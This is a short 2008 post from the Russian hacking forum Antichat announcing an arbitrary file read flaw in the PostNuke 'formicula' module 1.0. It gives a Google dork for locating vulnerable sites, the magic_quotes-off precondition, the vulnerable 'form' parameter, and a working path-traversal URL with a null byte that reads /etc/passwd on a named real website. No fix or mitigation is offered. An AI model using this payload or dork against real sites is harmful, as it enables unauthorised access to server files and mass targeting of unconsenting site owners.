
21.12.2008, 19:04
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
PostNuke. Модуль: formicula Чтение произвольных файлов
Уязвимый продукт: Модуль: formicula
Версия: 1.0
Дорк: "inurl:module=formicula"
Условие: "magic_quotes-off"
Ещё одна читалка, и опять не нашёл где скачать код, хотя по дорку модуль вроде достаточно популярен
Уязвимый параметр form
Пример уязвимости:
http://www.seacom-dtms.de/index.php?module=formicula&func=main&form=/../../../../../../../etc/passwd%00
|
|
|